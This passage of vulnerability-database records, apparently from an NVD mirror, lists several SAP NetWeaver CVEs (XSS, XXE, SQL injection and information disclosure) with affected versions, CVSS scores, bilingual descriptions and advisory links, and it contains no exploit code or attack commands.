| af854a3a-2127-422b-91ae-364da2661108 | https://wiki.scn.sap.com/wiki/pages/viewpage.action?pageId=587169983 | Vendor Advisory |
Impacted products
{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:sap:netweaver:700:*:*:*:*:*:*:*",
"matchCriteriaId": "A7FED49E-6F9A-494A-9226-1059249960A0",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:sap:netweaver:701:*:*:*:*:*:*:*",
"matchCriteriaId": "4836C36D-242F-4818-81B4-C170959D02F5",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:sap:netweaver:702:*:*:*:*:*:*:*",
"matchCriteriaId": "6A503ABF-8655-40D7-96AD-2D7F19A673AE",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:sap:netweaver:730:*:*:*:*:*:*:*",
"matchCriteriaId": "19723B03-F577-425E-BDED-AFBA1D256F7F",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "SAP NetWeaver - versions 700, 701, 702, 730, does not sufficiently encode user-controlled inputs, allowing an attacker to cause a potential victim to supply a malicious content to a vulnerable web application, which is then reflected to the victim and executed by the web browser, resulting in Cross-Site Scripting vulnerability."
},
{
"lang": "es",
"value": "SAP NetWeaver - versiones 700, 701, 702, 730, no codifica suficientemente las entradas controladas por el usuario, permitiendo a un atacante causar que una v\u00edctima potencial suministre un contenido malicioso a una aplicaci\u00f3n web vulnerable, que luego es reflejado a la v\u00edctima y ejecutado por el navegador web, resultando en una vulnerabilidad de tipo Cross-Site Scripting"
}
],
"id": "CVE-2021-38183",
"lastModified": "2024-11-21T06:16:35.350",
"metrics": {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
"version": "2.0"
},
"exploitabilityScore": 8.6,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": true
}
],
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 6.1,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 2.7,
"source": "nvd@nist.gov",
"type": "Primary"
}
]
},
"published": "2021-10-12T15:15:08.993",
"references": [
{
"source": "cna@sap.com",
"tags": [
"Permissions Required"
],
"url": "https://launchpad.support.sap.com/#/notes/3084937"
},
{
"source": "cna@sap.com",
"tags": [
"Vendor Advisory"
],
"url": "https://wiki.scn.sap.com/wiki/pages/viewpage.action?pageId=587169983"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Permissions Required"
],
"url": "https://launchpad.support.sap.com/#/notes/3084937"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Vendor Advisory"
],
"url": "https://wiki.scn.sap.com/wiki/pages/viewpage.action?pageId=587169983"
}
],
"sourceIdentifier": "cna@sap.com",
"vulnStatus": "Modified",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-79"
}
],
"source": "nvd@nist.gov",
"type": "Primary"
}
]
}
Vulnerability from fkie_nvd
Published
2012-02-23 20:07
Modified
2024-11-21 01:36
Severity ?
Summary
Unspecified vulnerability in the MessagingSystem servlet in SAP NetWeaver 7.0 allows remote attackers to obtain sensitive information about the MessagingSystem Performance Data via unspecified vectors.
References
{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:sap:netweaver:7.0:*:*:*:*:*:*:*",
"matchCriteriaId": "41FAC5DD-D577-47F9-B0CA-006032256642",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "Unspecified vulnerability in the MessagingSystem servlet in SAP NetWeaver 7.0 allows remote attackers to obtain sensitive information about the MessagingSystem Performance Data via unspecified vectors."
},
{
"lang": "es",
"value": "Vulnerabilidad no especificada en el servlet MessagingSystem en SAP NetWeaver v7.0 permite a atacantes remotos obtener informaci\u00f3n sensible acerca de los datos de rendimiento a trav\u00e9s de vectores no especificados MessagingSystem."
}
],
"id": "CVE-2012-1292",
"lastModified": "2024-11-21T01:36:47.027",
"metrics": {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "NONE",
"baseScore": 5.0,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "NONE",
"vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N",
"version": "2.0"
},
"exploitabilityScore": 10.0,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": false
}
]
},
"published": "2012-02-23T20:07:25.987",
"references": [
{
"source": "cve@mitre.org",
"url": "http://dsecrg.com/pages/vul/show.php?id=416"
},
{
"source": "cve@mitre.org",
"tags": [
"Vendor Advisory"
],
"url": "http://secunia.com/advisories/47861"
},
{
"source": "cve@mitre.org",
"url": "http://www.sdn.sap.com/irj/sdn/index?rid=/webcontent/uuid/c05604f6-4eb3-2d10-eea7-ceb666083a6a"
},
{
"source": "cve@mitre.org",
"url": "http://www.securityfocus.com/bid/52101"
},
{
"source": "cve@mitre.org",
"url": "https://service.sap.com/sap/support/notes/1585527"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "http://dsecrg.com/pages/vul/show.php?id=416"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Vendor Advisory"
],
"url": "http://secunia.com/advisories/47861"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "http://www.sdn.sap.com/irj/sdn/index?rid=/webcontent/uuid/c05604f6-4eb3-2d10-eea7-ceb666083a6a"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "http://www.securityfocus.com/bid/52101"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "https://service.sap.com/sap/support/notes/1585527"
}
],
"sourceIdentifier": "cve@mitre.org",
"vulnStatus": "Modified",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "NVD-CWE-noinfo"
}
],
"source": "nvd@nist.gov",
"type": "Primary"
}
]
}
Vulnerability from fkie_nvd
Published
2018-09-11 15:29
Modified
2024-11-21 04:03
Severity ?
Summary
SAP WebDynpro Java, versions 7.20, 7.30, 7.31, 7.40, 7.50, does not sufficiently encode user-controlled inputs, resulting in a stored Cross-Site Scripting (XSS) vulnerability.
References
| ▼ | URL | Tags | |
|---|---|---|---|
| cna@sap.com | http://www.securityfocus.com/bid/105308 | Third Party Advisory, VDB Entry | |
| cna@sap.com | https://launchpad.support.sap.com/#/notes/2679378 | Permissions Required, Vendor Advisory | |
| cna@sap.com | https://wiki.scn.sap.com/wiki/pages/viewpage.action?pageId=499356993 | Vendor Advisory | |
| af854a3a-2127-422b-91ae-364da2661108 | http://www.securityfocus.com/bid/105308 | Third Party Advisory, VDB Entry | |
| af854a3a-2127-422b-91ae-364da2661108 | https://launchpad.support.sap.com/#/notes/2679378 | Permissions Required, Vendor Advisory | |
| af854a3a-2127-422b-91ae-364da2661108 | https://wiki.scn.sap.com/wiki/pages/viewpage.action?pageId=499356993 | Vendor Advisory |
Impacted products
{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:sap:netweaver:7.20:*:*:*:*:*:*:*",
"matchCriteriaId": "53B11A3B-C559-428C-8946-7FD9FFBFA1BC",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:sap:netweaver:7.30:*:*:*:*:*:*:*",
"matchCriteriaId": "606EFE4F-57A4-44E2-A98D-F0867A658218",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:sap:netweaver:7.31:*:*:*:*:*:*:*",
"matchCriteriaId": "FECD5E96-7669-4747-80D2-27F95BF420BC",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:sap:netweaver:7.40:*:*:*:*:*:*:*",
"matchCriteriaId": "F019F7F5-7740-4BD4-850F-D7A1923C6200",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:sap:netweaver:7.50:*:*:*:*:*:*:*",
"matchCriteriaId": "F2B37045-2FB7-49BB-AE38-B84FAA6ADFB0",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "SAP WebDynpro Java, versions 7.20, 7.30, 7.31, 7.40, 7.50, does not sufficiently encode user-controlled inputs, resulting in a stored Cross-Site Scripting (XSS) vulnerability."
},
{
"lang": "es",
"value": "SAP WebDynpro Java 7.20, 7.30, 7.31, 7.40 y 7.50 no cifra lo suficiente las entradas controladas por el usuario, lo que resulta en una vulnerabilidad de Cross-Site Scripting (XSS) persistente."
}
],
"id": "CVE-2018-2464",
"lastModified": "2024-11-21T04:03:51.707",
"metrics": {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
"version": "2.0"
},
"exploitabilityScore": 8.6,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": true
}
],
"cvssMetricV30": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 6.1,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
"version": "3.0"
},
"exploitabilityScore": 2.8,
"impactScore": 2.7,
"source": "nvd@nist.gov",
"type": "Primary"
}
]
},
"published": "2018-09-11T15:29:02.017",
"references": [
{
"source": "cna@sap.com",
"tags": [
"Third Party Advisory",
"VDB Entry"
],
"url": "http://www.securityfocus.com/bid/105308"
},
{
"source": "cna@sap.com",
"tags": [
"Permissions Required",
"Vendor Advisory"
],
"url": "https://launchpad.support.sap.com/#/notes/2679378"
},
{
"source": "cna@sap.com",
"tags": [
"Vendor Advisory"
],
"url": "https://wiki.scn.sap.com/wiki/pages/viewpage.action?pageId=499356993"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory",
"VDB Entry"
],
"url": "http://www.securityfocus.com/bid/105308"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Permissions Required",
"Vendor Advisory"
],
"url": "https://launchpad.support.sap.com/#/notes/2679378"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Vendor Advisory"
],
"url": "https://wiki.scn.sap.com/wiki/pages/viewpage.action?pageId=499356993"
}
],
"sourceIdentifier": "cna@sap.com",
"vulnStatus": "Modified",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-79"
}
],
"source": "nvd@nist.gov",
"type": "Primary"
}
]
}
Vulnerability from fkie_nvd
Published
2013-11-20 14:12
Modified
2024-11-21 01:59
Severity ?
Summary
GRMGApp in SAP NetWeaver allows remote attackers to have unspecified impact and attack vectors, related to an XML External Entity (XXE) issue.
References
{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:sap:netweaver:-:*:*:*:*:*:*:*",
"matchCriteriaId": "CB7AAA9B-5209-4419-87DA-8130843AD2AF",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "GRMGApp in SAP NetWeaver allows remote attackers to have unspecified impact and attack vectors, related to an XML External Entity (XXE) issue."
},
{
"lang": "es",
"value": "GRMGApp en SAP NetWeaver permite a atacantes remotos conseguir un impacto y vectores de ataque sin especificar, relacionado con un problema de XML External Entity (XXE)."
}
],
"id": "CVE-2013-6822",
"lastModified": "2024-11-21T01:59:46.570",
"metrics": {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "HIGH",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "COMPLETE",
"baseScore": 10.0,
"confidentialityImpact": "COMPLETE",
"integrityImpact": "COMPLETE",
"vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
"version": "2.0"
},
"exploitabilityScore": 10.0,
"impactScore": 10.0,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": false
}
]
},
"published": "2013-11-20T14:12:31.023",
"references": [
{
"source": "cve@mitre.org",
"url": "http://scn.sap.com/docs/DOC-8218"
},
{
"source": "cve@mitre.org",
"url": "https://erpscan.io/advisories/dsecrg-13-002-sap-grmgapp-xxe-and-authentication-bypass/"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "http://scn.sap.com/docs/DOC-8218"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "https://erpscan.io/advisories/dsecrg-13-002-sap-grmgapp-xxe-and-authentication-bypass/"
}
],
"sourceIdentifier": "cve@mitre.org",
"vulnStatus": "Modified",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "NVD-CWE-noinfo"
}
],
"source": "nvd@nist.gov",
"type": "Primary"
}
]
}
Vulnerability from fkie_nvd
Published
2013-02-12 20:55
Modified
2024-11-21 01:34
Severity ?
Summary
Cross-site scripting (XSS) vulnerability in RetrieveMailExamples in SAP NetWeaver 7.30 and earlier allows remote attackers to inject arbitrary web script or HTML via the server parameter.
References
Impacted products
{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:sap:netweaver:*:*:*:*:*:*:*:*",
"matchCriteriaId": "017DF2FF-70F0-4BEF-B721-912A3A51A8E6",
"versionEndIncluding": "7.30",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:sap:netweaver:7.0:*:*:*:*:*:*:*",
"matchCriteriaId": "41FAC5DD-D577-47F9-B0CA-006032256642",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:sap:netweaver:7.0:ehp1:*:*:*:*:*:*",
"matchCriteriaId": "9FC1767F-10BD-468B-8D2B-538C82EB69B2",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:sap:netweaver:7.0:ehp2:*:*:*:*:*:*",
"matchCriteriaId": "D04DC424-129B-448D-994B-7AC5D9B64703",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:sap:netweaver:7.0:sp15:*:*:*:*:*:*",
"matchCriteriaId": "ABEE6BE3-556F-4A1E-8FA3-CD5E5C1D42E9",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:sap:netweaver:7.0:sp8:*:*:*:*:*:*",
"matchCriteriaId": "73914503-E9AA-4382-85FC-B0DD45ABDD77",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:sap:netweaver:7.01:*:*:*:*:*:*:*",
"matchCriteriaId": "2794A7DB-D5B8-467E-93F4-D65245FF187D",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:sap:netweaver:7.02:*:*:*:*:*:*:*",
"matchCriteriaId": "A9805246-77E5-456C-B7CF-07CFF2F9F069",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:sap:netweaver:7.10:*:*:*:*:*:*:*",
"matchCriteriaId": "EDFFDB95-B956-4B22-81F4-A4074D49D4A8",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "Cross-site scripting (XSS) vulnerability in RetrieveMailExamples in SAP NetWeaver 7.30 and earlier allows remote attackers to inject arbitrary web script or HTML via the server parameter."
},
{
"lang": "es",
"value": "Vulnerabilidad de ejecuci\u00f3n de secuencias de comandos en sitios cruzados (XSS) en RetrieveMailExamples en SAP NetWeaver v7.30 y anteriores, permite a atacantes remotos inyectar secuencias de comandos web y HTML de su elecci\u00f3n a trav\u00e9s del par\u00e1metro \"server\"."
}
],
"id": "CVE-2011-5263",
"lastModified": "2024-11-21T01:34:00.837",
"metrics": {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
"version": "2.0"
},
"exploitabilityScore": 8.6,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": true
}
]
},
"published": "2013-02-12T20:55:03.823",
"references": [
{
"source": "cve@mitre.org",
"tags": [
"Exploit"
],
"url": "http://dsecrg.com/pages/vul/show.php?id=330"
},
{
"source": "cve@mitre.org",
"tags": [
"Vendor Advisory"
],
"url": "http://secunia.com/advisories/45708"
},
{
"source": "cve@mitre.org",
"url": "http://www.sdn.sap.com/irj/scn/index?rid=/webcontent/uuid/50316177-762d-2f10-0993-a2206cc349b4"
},
{
"source": "cve@mitre.org",
"url": "http://www.securityfocus.com/archive/1/520551/100/0/threaded"
},
{
"source": "cve@mitre.org",
"url": "http://www.securityfocus.com/bid/49266/info"
},
{
"source": "cve@mitre.org",
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/69331"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit"
],
"url": "http://dsecrg.com/pages/vul/show.php?id=330"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Vendor Advisory"
],
"url": "http://secunia.com/advisories/45708"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "http://www.sdn.sap.com/irj/scn/index?rid=/webcontent/uuid/50316177-762d-2f10-0993-a2206cc349b4"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "http://www.securityfocus.com/archive/1/520551/100/0/threaded"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "http://www.securityfocus.com/bid/49266/info"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/69331"
}
],
"sourceIdentifier": "cve@mitre.org",
"vulnStatus": "Modified",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-79"
}
],
"source": "nvd@nist.gov",
"type": "Primary"
}
]
}
Vulnerability from fkie_nvd
Published
2020-07-14 13:15
Modified
2024-11-21 05:35
Severity ?
Summary
SAP NetWeaver - XML Toolkit for JAVA (ENGINEAPI) (versions- 7.10, 7.11, 7.20, 7.30, 7.31, 7.40, 7.50), under certain conditions allows an attacker to access information which would otherwise be restricted, leading to Information Disclosure.
References
| ▼ | URL | Tags | |
|---|---|---|---|
| cna@sap.com | https://launchpad.support.sap.com/#/notes/2932473 | Permissions Required, Vendor Advisory | |
| cna@sap.com | https://wiki.scn.sap.com/wiki/pages/viewpage.action?pageId=552599675 | Vendor Advisory | |
| af854a3a-2127-422b-91ae-364da2661108 | https://launchpad.support.sap.com/#/notes/2932473 | Permissions Required, Vendor Advisory | |
| af854a3a-2127-422b-91ae-364da2661108 | https://wiki.scn.sap.com/wiki/pages/viewpage.action?pageId=552599675 | Vendor Advisory |
Impacted products
{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:sap:netweaver:7.10:*:*:*:*:*:*:*",
"matchCriteriaId": "EDFFDB95-B956-4B22-81F4-A4074D49D4A8",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:sap:netweaver:7.11:*:*:*:*:*:*:*",
"matchCriteriaId": "21A3F6A8-B060-48CE-841F-698F8F779191",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:sap:netweaver:7.20:*:*:*:*:*:*:*",
"matchCriteriaId": "53B11A3B-C559-428C-8946-7FD9FFBFA1BC",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:sap:netweaver:7.30:*:*:*:*:*:*:*",
"matchCriteriaId": "606EFE4F-57A4-44E2-A98D-F0867A658218",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:sap:netweaver:7.31:*:*:*:*:*:*:*",
"matchCriteriaId": "FECD5E96-7669-4747-80D2-27F95BF420BC",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:sap:netweaver:7.40:*:*:*:*:*:*:*",
"matchCriteriaId": "F019F7F5-7740-4BD4-850F-D7A1923C6200",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:sap:netweaver:7.50:*:*:*:*:*:*:*",
"matchCriteriaId": "F2B37045-2FB7-49BB-AE38-B84FAA6ADFB0",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "SAP NetWeaver - XML Toolkit for JAVA (ENGINEAPI) (versions- 7.10, 7.11, 7.20, 7.30, 7.31, 7.40, 7.50), under certain conditions allows an attacker to access information which would otherwise be restricted, leading to Information Disclosure."
},
{
"lang": "es",
"value": "SAP NetWeaver - XML ??Toolkit for JAVA (ENGINEAPI) (versiones 7.10, 7.11, 7.20, 7.30, 7.31, 7.40, 7.50), bajo determinadas condiciones, permite a un atacante acceder a informaci\u00f3n que de otro modo estar\u00eda restringida, conllevando a una Divulgaci\u00f3n de Informaci\u00f3n"
}
],
"id": "CVE-2020-6285",
"lastModified": "2024-11-21T05:35:26.257",
"metrics": {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "LOW",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"availabilityImpact": "NONE",
"baseScore": 3.5,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "NONE",
"vectorString": "AV:N/AC:M/Au:S/C:P/I:N/A:N",
"version": "2.0"
},
"exploitabilityScore": 6.8,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": false
}
],
"cvssMetricV30": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 7.7,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "NONE",
"privilegesRequired": "LOW",
"scope": "CHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N",
"version": "3.0"
},
"exploitabilityScore": 3.1,
"impactScore": 4.0,
"source": "cna@sap.com",
"type": "Secondary"
}
],
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "HIGH",
"integrityImpact": "NONE",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 3.6,
"source": "nvd@nist.gov",
"type": "Primary"
}
]
},
"published": "2020-07-14T13:15:12.827",
"references": [
{
"source": "cna@sap.com",
"tags": [
"Permissions Required",
"Vendor Advisory"
],
"url": "https://launchpad.support.sap.com/#/notes/2932473"
},
{
"source": "cna@sap.com",
"tags": [
"Vendor Advisory"
],
"url": "https://wiki.scn.sap.com/wiki/pages/viewpage.action?pageId=552599675"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Permissions Required",
"Vendor Advisory"
],
"url": "https://launchpad.support.sap.com/#/notes/2932473"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Vendor Advisory"
],
"url": "https://wiki.scn.sap.com/wiki/pages/viewpage.action?pageId=552599675"
}
],
"sourceIdentifier": "cna@sap.com",
"vulnStatus": "Modified",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "NVD-CWE-noinfo"
}
],
"source": "nvd@nist.gov",
"type": "Primary"
}
]
}
Vulnerability from fkie_nvd
Published
2015-08-24 14:59
Modified
2024-11-21 02:35
Severity ?
Summary
XML external entity (XXE) vulnerability in SAP NetWeaver Portal 7.4 allows remote attackers to read arbitrary files and possibly have other unspecified impact via crafted XML data, aka SAP Security Note 2168485.
References
{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:sap:netweaver:7.40:*:*:*:*:*:*:*",
"matchCriteriaId": "F019F7F5-7740-4BD4-850F-D7A1923C6200",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "XML external entity (XXE) vulnerability in SAP NetWeaver Portal 7.4 allows remote attackers to read arbitrary files and possibly have other unspecified impact via crafted XML data, aka SAP Security Note 2168485."
},
{
"lang": "es",
"value": "Vulnerabilidad de entidad externa XML (XXE) en SAP NetWeaver Portal 7.4, permite a atacantes remotos leer archivos arbitrarios o posiblemente tener otro impacto no especificado a trav\u00e9s de datos XML manipulados, tambi\u00e9n conocida como SAP Security Note 2168485."
}
],
"evaluatorComment": "\u003ca href=\"http://cwe.mitre.org/data/definitions/611.html\"\u003eCWE-611: Improper Restriction of XML External Entity Reference (\u0027XXE\u0027)\u003c/a\u003e",
"id": "CVE-2015-6662",
"lastModified": "2024-11-21T02:35:23.393",
"metrics": {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 6.8,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
"exploitabilityScore": 8.6,
"impactScore": 6.4,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": true
}
]
},
"published": "2015-08-24T14:59:19.507",
"references": [
{
"source": "cve@mitre.org",
"url": "http://packetstormsecurity.com/files/134507/SAP-NetWeaver-7.4-XXE-Injection.html"
},
{
"source": "cve@mitre.org",
"url": "http://seclists.org/fulldisclosure/2015/Nov/92"
},
{
"source": "cve@mitre.org",
"url": "http://www.securityfocus.com/archive/1/536957/100/0/threaded"
},
{
"source": "cve@mitre.org",
"url": "https://erpscan.io/advisories/erpscan-15-018-sap-netweaver-7-4-xxe/"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "http://packetstormsecurity.com/files/134507/SAP-NetWeaver-7.4-XXE-Injection.html"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "http://seclists.org/fulldisclosure/2015/Nov/92"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "http://www.securityfocus.com/archive/1/536957/100/0/threaded"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "https://erpscan.io/advisories/erpscan-15-018-sap-netweaver-7-4-xxe/"
}
],
"sourceIdentifier": "cve@mitre.org",
"vulnStatus": "Modified",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "NVD-CWE-Other"
}
],
"source": "nvd@nist.gov",
"type": "Primary"
}
]
}
Vulnerability from fkie_nvd
Published
2013-12-13 20:08
Modified
2024-11-21 02:00
Severity ?
Summary
SQL injection vulnerability in the RSDDCVER_COUNT_TAB_COLS function in SAP NetWeaver 7.30 allows remote attackers to execute arbitrary SQL commands via unspecified vectors.
References
{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:sap:netweaver:7.30:*:*:*:*:*:*:*",
"matchCriteriaId": "606EFE4F-57A4-44E2-A98D-F0867A658218",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "SQL injection vulnerability in the RSDDCVER_COUNT_TAB_COLS function in SAP NetWeaver 7.30 allows remote attackers to execute arbitrary SQL commands via unspecified vectors."
},
{
"lang": "es",
"value": "Vulnerabilidad de inyecci\u00f3n SQL en la funci\u00f3n RSDDCVER_COUNT_TAB_COLS de SAP NetWeaver 7.30 permite a atacantes remotos ejecutar comandos SQL de forma arbitraria a trav\u00e9s de vectores no especificados."
}
],
"id": "CVE-2013-7094",
"lastModified": "2024-11-21T02:00:20.180",
"metrics": {
